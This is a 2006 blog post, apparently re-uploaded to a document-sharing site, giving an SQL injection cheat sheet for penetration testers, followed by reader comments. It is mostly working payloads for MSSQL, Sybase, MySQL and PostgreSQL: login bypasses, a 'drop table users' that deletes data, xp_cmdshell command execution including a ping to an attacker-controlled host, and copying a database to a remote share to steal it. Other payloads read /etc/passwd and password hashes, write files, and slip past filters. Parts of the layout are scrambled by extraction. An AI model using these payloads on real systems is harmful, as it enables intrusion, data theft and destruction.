Operation N SQL Injection Cheat Sheet

Operation n SQL Injection Cheat Sheet
Operation n
A Hackers Diary
SQL Injection Cheat Sheet

Posted in Main on 3rd November 2006
Related articles: Input Validation Cheat Sheet (Want to find other input validation problems?)
Table of Contents
Generic - Bypass Authentication
Microsoft SQL
Sybase
MySQL
Oracle
PostgreSQL
Bypass SQL Injection Filters
References and Credits
ChangeLog
http://michaeldaw.org/sql-injection-cheat-sheet/ (1 of 15)5/9/2007 5:10:48 PM
Date
Change
13/03/07
03/01/06
Added some more blind SQL injection tests for MySQL (Author: jungsonn)
21/12/06
Added Concat tests for blind SQL Injection tests.
06/Nov/06
Added PostgreSQL payloads
06/Nov/06
Added Data to Oracle
06/Nov/06
Added Sybase section
Oct/06
Wrote initial paper.
Introduction
Comments:
This paper was primarily written to aid penetration testers. I hope you find it useful. Please email me additional payloads as you find them.
Generic - Bypass Authentication
The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow
you to authenticate to the web application (unless otherwise stated).
Payload
Description (if any)
realusername' or 1=1
Authenticate as a real user without requiring a password.
' OR '' = '
Allows authentication without a valid username.
admin'
Authenticate as user admin without a password.
' union select 1, 'user', 'pass' 1
Requires knowledge of column names.
'; drop table users
DANGEROUS! this will delete the user database if the table name is "users".
Microsoft SQL
Payload
sp_traceXXX audit evasion. The sp_password prevents
storing clear text passwords in the log files. Appending this 'admin sp_password after your comments () can prevent SQL Injection queries
being logged.
select @@version
View database version.
select @@servername
Misc. information disclosure
select @@microsoftversion
select * from master..sysservers
select * from sysusers
View database usernames and passwords.
exec master..xp_cmdshell 'ipconfig+/all'
Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
Misc. command execution with cp_cmdshell - this is useful exec master..xp_cmdshell 'ping+system-controlled-by-attacker' for blind SQL Injection tests (where no results are displayed).
Backup entire database to a file. This attack can be used to BACKUP database master to disks='\\{IP}\{sharename}\backupdb.dat' steal a database.
create table myfile (line varchar(8000))" bulk insert foo from c:\inetpub\wwwroot Reading files on the filesystem. \auth.asp" select * from myfile"
xp_servicecontrol (START or STOP) <service>
Start and stop Windows Services.
str1 + str2 OR n+n
Concat strings for blind SQL Injection tests.
Sybase
Payload
select @@version"
select name from master..syslogins"
select name from master..sysdatabases"
convert(integer,(select+min(name)+from+syslogins+where+name>'))
Integer conversion error trick.
An error will occur presenting the first
value of the rowset (lets say its sybase).
We then continue as before by placing the convert(integer,(select+min(name)+from+syslogins+where+name>'sybase')) value into our query. An error will then
present the next value in the rowset. We
continue as before.
Misc. command execution with xp_cmdshell 'ipconfig+/all' cp_cmdshell.
Misc. command execution with xp_cmdshell 'net+view' cp_cmdshell.
Misc. command execution with xp_cmdshell 'net+users' cp_cmdshell.
Misc. command execution with
cp_cmdshell - this is useful for blind SQL xp_cmdshell 'ping+system-controlled-by-attacker' Injection tests (where no results are
displayed).
Misc. command execution with
cp_cmdshell - this is useful for blind SQL waitfor delay '0:0:5' Injection tests (where no results are
displayed).
create proxy_table myfile external file at "c:\temp\file_to_read.txt" select * from myfile"
Reading files on the filesystem.
create table myfile (record varchar(2000)) external file at "c:\temp\myfile.exe" insert into myfile Write file to filesystem. values(0xAND_YOUR_BINARY_DATA)"
str1 + str2 or n+n
MySQL
Payload
select @@version;
select host,user,db from mysql.db;
select host,user,password from mysql.user;
View MySQL usernames and passwords.
create table myfile (input TEXT); load data infile /etc/passwd into table
myfile; OR load data infile /home/{user}/.rhosts into table myfile; select *
Reading files on the filesystem.
from myfile;
Write files on the filesystem. This attack is limited by the fact select host,user,password from user into outfile /tmp/passwd; that you can only write to either /tmp or /var/tmp.
select CONCAT(a,b);
BENCHMARK(1000000000,MD5(gainingtime))
Cause delay for blind SQL Injection tests.
Cause delay for blind SQL Injection tests. Same as before, but BENCHMARK(1000000000,MD5(CHAR(116))) this can be used if quotes are filtered.
IF EXISTS (SELECT * FROM users WHERE username = root) Check if username exists, if yes there will be an delay. BENCHMARK(1000000000,MD5(gainingtime))
IF EXISTS (SELECT * FROM users WHERE username = root) WAITFOR
Check if username exists, if yes there will be an delay for 3
DELAY 0:0:3
seconds.
Oracle
Robert Hurlbut has put together an awesome document on Oracle SQL Injection. He seems to have far more experience in this area then I, so
i will merely present a link to his blog entry on this topic (http://weblogs.asp.net/rhurlbut/archive/2004/01/24/62560.aspx).
Payload
str1 || str2 OR CONCAT (str1, str2)
PostgreSQL
Payload
select version();
select current_database();
select current_user;
select session_user;
select current_setting(log_connections);
select current_setting(log_statement);
select current_setting(port);
select current_setting(password_encryption);
select current_setting(krb_server_keyfile);
select current_setting(virtual_host);
select current_setting(port);
select current_setting(config_file);
select current_setting(hba_file);
select current_setting(data_directory);
select * from pg_shadow;
select * from pg_group;
create table myfile (input TEXT); copy myfile from /etc/passwd; select * from myfile;
Read files on the filesystem.
copy myfile to /tmp/test;
Write files to filesystem.
str1 || str2
Payload
select password from tablename where username = concat(char(39),
char(97),char(100),char(109),char(105),char(110),char( 39)) into
Writing info into files without single quotes (example). You must specify a
outfile concat(char(39),char(97),char(100),char(109),char(105),char
new file (it may not exist) and give the correct pathname.
(110),char( 39))
select * from login where user = char(39,97,39)
Using char() to bypass restrictions.
References and Credits:
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
Related articles:
Input Validation Cheat Sheet (Want to find other input validation problems?)
External links:
Ferruh's SQL Injection Cheat Sheet
Jungsonn's SQL Injection Cheat Sheet
RSnake's SQL Injection Cheat Sheet
6 Responses to SQL Injection Cheat Sheet
1. Hey the top part of your sybase entries are really MS SQL?
Comment by trevor 27 November 2006 @ 8:48 pm
2. trevor:
The code base for Microsoft SQL Server (prior to version 7.0) originated in Sybase SQL Server (see http://en.wikipedia.org/wiki/
Microsoft_SQL_Server). Hence, why the commands look the same as MSSQL.
Comment by david.kierznowski 27 November 2006 @ 11:43 pm
3. Ahh, and so I learn more about sybase :) Thanks.
Comment by trevor 1 December 2006 @ 1:10 pm
4. Good Cheat Sheet! :) 10x
Hello from RUS.
Comment by Anatoly 20 December 2006 @ 10:15 am
5. Would be great to see a similar xml file as rsnakes XSS cheatsheet !
Like:
Generic: auth as a real user without password
realusername' or 1=1-
Authenticate as a real user without requiring a password.
Generic
Generic
With class replaced by and or something like that.
Would allow using the XSS Forms greasemonkey script and/or CAL9000 together with input validation & sql injection I started
work but its kindof useless if i have to update the xml every time its updated.
Anyway cool resource !!
Comment by ethernode 2 May 2007 @ 3:10 pm
Trackbacks
1. [] finding the SQL Injection Cheat sheet useful, I decided to also release an Input Validation Cheat sheet. As usual feedback and
[]
Pingback by Operation n Input Validation Cheat Sheet Released 12 April 2007 @ 12:24 am
RSS feed for comments on this post. TrackBack URI
Leave a Comment
Name(required)
E-mail (will not be published) (required)
URI
Submit Comment
Recommended Links
Input Validation Cheat Sheet SQL Injection Cheat Sheet Backdooring PDF Files Web Backdoor Compilation CSRF with MSWord Hacking HomePlug Networks WordPress templatephp Exploit
q q q q q q q
Support michaeldaw.org
Latest Entries
Mens Rules Tell me how to hack? AVs prove less-effective ASP-Auditor v2.2 Release Hotlinks and Persistent CSRF - leech the leech Web Backdoor Compilation 1b released. Tabular Cheat Sheets Input Validation Cheat Sheet Released Wireless Penetration Testing Mindmap Bypassing ASP.NET XSS Filters
q q q q q q q q q q
Pages
About Operation n Hacking Web 2.0 MindMap Projects MD's Vuls Michael's Toolbox SQL Injection Cheat Sheet Input Validation Cheat Sheet Site Disclaimer
q q q q q q q q
Operation n by Category
Alerts Chapter0 Chapter1 Diary Funstuff Great Links Main Michael Daws Hacks Michaels Recipes News Papers Projects
q q q q q q q q q q q q
Search Operation n
Search
Meta
r
Valid XHTML

Operation N SQL Injection Cheat Sheet

Uploaded by

Copyright:

Available Formats

Operation N SQL Injection Cheat Sheet

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Operation N SQL Injection Cheat Sheet

Uploaded by

Copyright:

Available Formats

Operation n SQL Injection Cheat Sheet

SQL Injection Cheat Sheet

Generic - Bypass Authentication

Bypass SQL Injection Filters

References and Credits

http://michaeldaw.org/sql-injection-cheat-sheet/ (1 of 15)5/9/2007 5:10:48 PM